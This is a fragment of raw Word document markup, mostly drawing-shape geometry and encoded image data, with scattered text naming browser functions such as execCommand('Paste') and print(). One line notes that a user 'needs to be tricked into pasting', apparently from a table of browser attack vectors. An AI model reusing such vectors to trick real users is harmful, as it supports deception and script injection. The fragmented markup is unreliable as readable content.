                              <a:gd name="T4" fmla="+- 0 8172 8151"/>
                              <a:gd name="T5" fmla="*/ T4 w 1762"/>
                              <a:gd name="T6" fmla="+- 0 274 92"/>
                              <a:gd name="T7" fmla="*/ 274 h 183"/>
                              <a:gd name="T8" fmla="+- 0 8169 8151"/>
                              <a:gd name="T9" fmla="*/ T8 w 1762"/>
                              <a:gd name="T10" fmla="+- 0 274 92"/>
                              <a:gd name="T11" fmla="*/ 274 h 183"/>
                              <a:gd name="T12" fmla="+- 0 8151 8151"/>
                              <a:gd name="T13" fmla="*/ T12 w 1762"/>
                              <a:gd name="T14" fmla="+- 0 253 92"/>
                              <a:gd name="T15" fmla="*/ 253 h 183"/>
                              <a:gd name="T16" fmla="+- 0 8151 8151"/>
                              <a:gd name="T17" fmla="*/ T16 w 1762"/>
                              <a:gd name="T18" fmla="+- 0 250 92"/>
                              <a:gd name="T19" fmla="*/ 250 h 183"/>
                              <a:gd name="T20" fmla="+- 0 8151 8151"/>
                              <a:gd name="T21" fmla="*/ T20 w 1762"/>
                              <a:gd name="T22" fmla="+- 0 113 92"/>
                              <a:gd name="T23" fmla="*/ 113 h 183"/>
                              <a:gd name="T24" fmla="+- 0 8172 8151"/>
                              <a:gd name="T25" fmla="*/ T24 w 1762"/>
                              <a:gd name="T26" fmla="+- 0 92 92"/>
                              <a:gd name="T27" fmla="*/ 92 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9892 8151"/>
                              <a:gd name="T29" fmla="*/ T28 w 1762"/>
                              <a:gd name="T30" fmla="+- 0 92 92"/>
                              <a:gd name="T31" fmla="*/ 92 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9913 8151"/>
                              <a:gd name="T33" fmla="*/ T32 w 1762"/>
                              <a:gd name="T34" fmla="+- 0 113 92"/>
                              <a:gd name="T35" fmla="*/ 113 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9913 8151"/>
                              <a:gd name="T37" fmla="*/ T36 w 1762"/>
                              <a:gd name="T38" fmla="+- 0 253 92"/>
                              <a:gd name="T39" fmla="*/ 253 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9895 8151"/>
                              <a:gd name="T41" fmla="*/ T40 w 1762"/>
                              <a:gd name="T42" fmla="+- 0 274 92"/>
                              <a:gd name="T43" fmla="*/ 274 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9892 8151"/>
                              <a:gd name="T45" fmla="*/ T44 w 1762"/>
                              <a:gd name="T46" fmla="+- 0 274 92"/>
                              <a:gd name="T47" fmla="*/ 27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62" h="183">
                                <a:moveTo>
                                  <a:pt x="174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741" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1762" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1762" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1744" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="174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6" name="Text Box 1146"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="8151" y="92"/>
                            <a:ext cx="176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9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execCommand("Paste")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45" o:spid="_x0000_s1287" style="position:absolute;left:0;text-align:left;margin-left:407.55pt;margin-top:4.6pt;width:88.1pt;height:9.15pt;z-index:15776256;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="8151,92" coordsize="176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">
                <v:shape id="Freeform 1147" o:spid="_x0000_s1288" style="position:absolute;left:8151;top:92;width:1762;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="176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K2vsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+C32HZQq96SbSFomuEiwFxR6M+gBjdkzS&#10;ZmdDdtW1T98tCN7m4/ud2SKYVlyod41lBekoAUFcWt1wpeCw/xxOQDiPrLG1TApu5GAxfxrMMNP2&#10;ygVddr4SMYRdhgpq77tMSlfWZNCNbEccuZPtDfoI+0rqHq8x3LRynCTv0mDDsaHGjpY1lT+7s1Ew&#10;/iq+k8n6t9hsP/Q23I5h2eaFUi/PIZ+C8BT8Q3x3r3Scn76+wf838QQ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Ctr7EAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1741,182l21,182r-3,l,161r,-3l,21,21,,1741,r21,21l1762,161r-18,21l1741,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1741,274;21,274;18,274;0,253;0,250;0,113;21,92;1741,92;1762,113;1762,253;1744,274;1741,274" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1146" o:spid="_x0000_s1289" type="#_x0000_t202" style="position:absolute;left:8151;top:92;width:176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bqCsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTedGMpoUZXEbFQKBRjPHgcs2Oy&#10;mJ2N2a2m/74rFLzN433OYtXbRtyo88axgukkAUFcOm24UnAoPsbvIHxA1tg4JgW/5GG1HA4WmGl3&#10;55xu+1CJGMI+QwV1CG0mpS9rsugnriWO3Nl1FkOEXSV1h/cYbhv5miSptGg4NtTY0qam8rL/sQrW&#10;R8635vp92uXn3BTFLOGv9KLUy6hfz0EE6sNT/O/+1HH+9C2F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bqC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9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execCommand("Paste")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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tricked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>pasting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>forced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
          <w:tab w:val="left" w:pos="7569"/>
        </w:tabs>
        <w:spacing w:before="96" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="2263" w:right="1296" w:hanging="2073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449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64770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1141" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="102"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1142" name="Freeform 1144"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="102"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 284 102"/>
                              <a:gd name="T3" fmla="*/ 284 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 284 102"/>
                              <a:gd name="T7" fmla="*/ 284 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 284 102"/>
                              <a:gd name="T11" fmla="*/ 284 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 263 102"/>
                              <a:gd name="T15" fmla="*/ 263 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 260 102"/>
                              <a:gd name="T19" fmla="*/ 260 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 123 102"/>
                              <a:gd name="T23" fmla="*/ 123 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 102 102"/>
                              <a:gd name="T27" fmla="*/ 102 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 102 102"/>
                              <a:gd name="T31" fmla="*/ 102 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 123 102"/>
                              <a:gd name="T35" fmla="*/ 123 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 263 102"/>
                              <a:gd name="T39" fmla="*/ 263 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 284 102"/>
                              <a:gd name="T43" fmla="*/ 284 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 284 102"/>
                              <a:gd name="T47" fmla="*/ 28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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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" name="Text Box 114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02"/>
                            <a:ext cx="133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onBeforePrint()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42" o:spid="_x0000_s1290" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:5.1pt;width:66.85pt;height:9.15pt;z-index:-17641984;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,102" coordsize="133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">
                <v:shape id="Freeform 1144" o:spid="_x0000_s1291" style="position:absolute;left:1930;top:102;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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UYSsYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9FN1EipXoKmpbKPQgjSJ4G7Jj&#10;spqdDdmtxv76rlDobR7vc2aLztbiQq03jhWkwwQEceG04VLBbvs+mIDwAVlj7ZgU3MjDYt57mGGm&#10;3ZW/6JKHUsQQ9hkqqEJoMil9UZFFP3QNceSOrrUYImxLqVu8xnBby1GSjKVFw7GhwobWFRXn/Nsq&#10;eDvsd6k5fXYv5TrfmMnt6Wf1Sko99rvlFESgLvyL/9wfOs5Pn0dw/yae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BUYSsYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,284;21,284;18,284;0,263;0,260;0,123;21,102;1316,102;1337,123;1337,263;1319,284;1316,284" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1143" o:spid="_x0000_s1292" type="#_x0000_t202" style="position:absolute;left:1930;top:102;width:133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FJksQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y1tkRqziohCoVAa48HjmJ0k&#10;i9nZNLvV+O/dQqG3ebzPyVaDbcWFem8cK5hOEhDEpdOGawWHYvf0BsIHZI2tY1JwIw+r5eghw1S7&#10;K+d02YdaxBD2KSpoQuhSKX3ZkEU/cR1x5CrXWwwR9rXUPV5juG3lc5LMpEXDsaHBjjYNlef9j1Ww&#10;PnK+Nd+fp6+8yk1RzBP+mJ2VehwP6wWIQEP4F/+533WcP319gd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BSZL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onBeforePrint()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5008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5283835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>64770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="424815" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1138" name="Group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815" cy="116205"/>
                          <a:chOff x="8321" y="102"/>
                          <a:chExt cx="669" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1139" name="Freeform 1141"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="8321" y="102"/>
                            <a:ext cx="669" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8968 8321"/>
                              <a:gd name="T1" fmla="*/ T0 w 669"/>
                              <a:gd name="T2" fmla="+- 0 284 102"/>
                              <a:gd name="T3" fmla="*/ 284 h 183"/>
                              <a:gd name="T4" fmla="+- 0 8342 8321"/>
                              <a:gd name="T5" fmla="*/ T4 w 669"/>
                              <a:gd name="T6" fmla="+- 0 284 102"/>
                              <a:gd name="T7" fmla="*/ 284 h 183"/>
                              <a:gd name="T8" fmla="+- 0 8339 8321"/>
                              <a:gd name="T9" fmla="*/ T8 w 669"/>
                              <a:gd name="T10" fmla="+- 0 284 102"/>
                              <a:gd name="T11" fmla="*/ 284 h 183"/>
                              <a:gd name="T12" fmla="+- 0 8321 8321"/>
                              <a:gd name="T13" fmla="*/ T12 w 669"/>
                              <a:gd name="T14" fmla="+- 0 263 102"/>
                              <a:gd name="T15" fmla="*/ 263 h 183"/>
                              <a:gd name="T16" fmla="+- 0 8321 8321"/>
                              <a:gd name="T17" fmla="*/ T16 w 669"/>
                              <a:gd name="T18" fmla="+- 0 260 102"/>
                              <a:gd name="T19" fmla="*/ 260 h 183"/>
                              <a:gd name="T20" fmla="+- 0 8321 8321"/>
                              <a:gd name="T21" fmla="*/ T20 w 669"/>
                              <a:gd name="T22" fmla="+- 0 123 102"/>
                              <a:gd name="T23" fmla="*/ 123 h 183"/>
                              <a:gd name="T24" fmla="+- 0 8342 8321"/>
                              <a:gd name="T25" fmla="*/ T24 w 669"/>
                              <a:gd name="T26" fmla="+- 0 102 102"/>
                              <a:gd name="T27" fmla="*/ 102 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8968 8321"/>
                              <a:gd name="T29" fmla="*/ T28 w 669"/>
                              <a:gd name="T30" fmla="+- 0 102 102"/>
                              <a:gd name="T31" fmla="*/ 102 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8989 8321"/>
                              <a:gd name="T33" fmla="*/ T32 w 669"/>
                              <a:gd name="T34" fmla="+- 0 123 102"/>
                              <a:gd name="T35" fmla="*/ 123 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8989 8321"/>
                              <a:gd name="T37" fmla="*/ T36 w 669"/>
                              <a:gd name="T38" fmla="+- 0 263 102"/>
                              <a:gd name="T39" fmla="*/ 263 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8971 8321"/>
                              <a:gd name="T41" fmla="*/ T40 w 669"/>
                              <a:gd name="T42" fmla="+- 0 284 102"/>
                              <a:gd name="T43" fmla="*/ 284 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8968 8321"/>
                              <a:gd name="T45" fmla="*/ T44 w 669"/>
                              <a:gd name="T46" fmla="+- 0 284 102"/>
                              <a:gd name="T47" fmla="*/ 28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69" h="183">
                                <a:moveTo>
                                  <a:pt x="647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47" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="668" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="668" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="650" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64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0" name="Text Box 1140"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="8321" y="102"/>
                            <a:ext cx="66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41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print()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9" o:spid="_x0000_s1293" style="position:absolute;left:0;text-align:left;margin-left:416.05pt;margin-top:5.1pt;width:33.45pt;height:9.15pt;z-index:-17641472;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="8321,102" coordsize="66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">
                <v:shape id="Freeform 1141" o:spid="_x0000_s1294" style="position:absolute;left:8321;top:102;width:669;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="66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zvB8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxR6040Vio2uImJp6UE0VfE4Zsck&#10;mJ0Nu6tJ/70rFHqbx/uc6bwztbiR85VlBcNBAoI4t7riQsHu56M/BuEDssbaMin4JQ/z2VNviqm2&#10;LW/ploVCxBD2KSooQ2hSKX1ekkE/sA1x5M7WGQwRukJqh20MN7V8TZI3abDi2FBiQ8uS8kt2NQpO&#10;3+vP5SXzq2u73bvVcZMfRm6s1Mtzt5iACNSFf/Gf+0vH+cPROzy+iS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87wfEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m647,182r-626,l18,182,,161r,-3l,21,21,,647,r21,21l668,161r-18,21l647,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="647,284;21,284;18,284;0,263;0,260;0,123;21,102;647,102;668,123;668,263;650,284;647,284" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1140" o:spid="_x0000_s1295" type="#_x0000_t202" style="position:absolute;left:8321;top:102;width:66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X5cYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzJCb7pRitjoKlIqCIXSmB56nGbH&#10;ZDE7m2ZXTf9951DwNsN789436+3gW3WlPrrABmbTDBRxFazj2sBnuZ8sQcWEbLENTAZ+KcJ28zBa&#10;Y27DjQu6HlOtJIRjjgaalLpc61g15DFOQ0cs2in0HpOsfa1tjzcJ962eZ9lCe3QsDQ129NJQdT5e&#10;vIHdFxev7uf9+6M4Fa4snzN+W5yNeRwPuxWoREO6m/+vD1bwZ0/CL9/ICHr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PX5c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41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print()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552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234950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1111250" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1135" name="Group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1250" cy="116205"/>
                          <a:chOff x="1930" y="370"/>
                          <a:chExt cx="1750" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1136" name="Freeform 1138"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="369"/>
                            <a:ext cx="1750" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3659 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1750"/>
                              <a:gd name="T2" fmla="+- 0 552 370"/>
                              <a:gd name="T3" fmla="*/ 552 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1750"/>
                              <a:gd name="T6" fmla="+- 0 552 370"/>
                              <a:gd name="T7" fmla="*/ 552 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1750"/>
                              <a:gd name="T10" fmla="+- 0 551 370"/>
                              <a:gd name="T11" fmla="*/ 551 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1750"/>
                              <a:gd name="T14" fmla="+- 0 531 370"/>
                              <a:gd name="T15" fmla="*/ 531 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1750"/>
                              <a:gd name="T18" fmla="+- 0 527 370"/>
                              <a:gd name="T19" fmla="*/ 527 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1750"/>
                              <a:gd name="T22" fmla="+- 0 391 370"/>
                              <a:gd name="T23" fmla="*/ 391 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1750"/>
                              <a:gd name="T26" fmla="+- 0 370 370"/>
                              <a:gd name="T27" fmla="*/ 370 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3659 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1750"/>
                              <a:gd name="T30" fmla="+- 0 370 370"/>
                              <a:gd name="T31" fmla="*/ 370 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3680 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1750"/>
                              <a:gd name="T34" fmla="+- 0 391 370"/>
                              <a:gd name="T35" fmla="*/ 391 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3680 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1750"/>
                              <a:gd name="T38" fmla="+- 0 531 370"/>
                              <a:gd name="T39" fmla="*/ 531 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3662 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1750"/>
                              <a:gd name="T42" fmla="+- 0 551 370"/>
                              <a:gd name="T43" fmla="*/ 551 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3659 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1750"/>
                              <a:gd name="T46" fmla="+- 0 552 370"/>
                              <a:gd name="T47" fmla="*/ 55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50" h="183">
                                <a:moveTo>
                                  <a:pt x="172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729" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1750" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1750" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172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" name="Text Box 113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69"/>
                            <a:ext cx="175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execCommand("Print")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6" o:spid="_x0000_s1296" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:18.5pt;width:87.5pt;height:9.15pt;z-index:-17640960;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,370" coordsize="175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">
                <v:shape id="Freeform 1138" o:spid="_x0000_s1297" style="position:absolute;left:1930;top:369;width:1750;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="175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Iq8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZQq96a6tBBtdRYRq6UW04nnIjklo&#10;djZm1yT9925B8DaP9zmLVW8r0VLjS8caJmMFgjhzpuRcw+nnczQD4QOywcoxafgjD6vlcLDA1LiO&#10;D9QeQy5iCPsUNRQh1KmUPivIoh+7mjhyF9dYDBE2uTQNdjHcVvJNqURaLDk2FFjTpqDs93izGi7d&#10;7vydTFU4dWq7b68f5XW222j9+tKv5yAC9eEpfri/TJw/eU/g/5t4gl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xIq8MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1729,182l21,182r-3,-1l,161r,-4l,21,21,,1729,r21,21l1750,161r-18,20l1729,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1729,552;21,552;18,551;0,531;0,527;0,391;21,370;1729,370;1750,391;1750,531;1732,551;1729,552" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1137" o:spid="_x0000_s1298" type="#_x0000_t202" style="position:absolute;left:1930;top:369;width:175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87MQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y0t2BqziohCoSCN8eBxzE6S&#10;xexsmt1q+u/dQqG3ebzPyVaDbcWVem8cK5hOEhDEpdOGawXHYvf0BsIHZI2tY1LwQx5Wy9FDhql2&#10;N87pegi1iCHsU1TQhNClUvqyIYt+4jriyFWutxgi7Gupe7zFcNvK5ySZSYuGY0ODHW0aKi+Hb6tg&#10;feJ8a77258+8yk1RzBP+mF2UehwP6wWIQEP4F/+533WcP315hd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8POz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execCommand("Print")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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
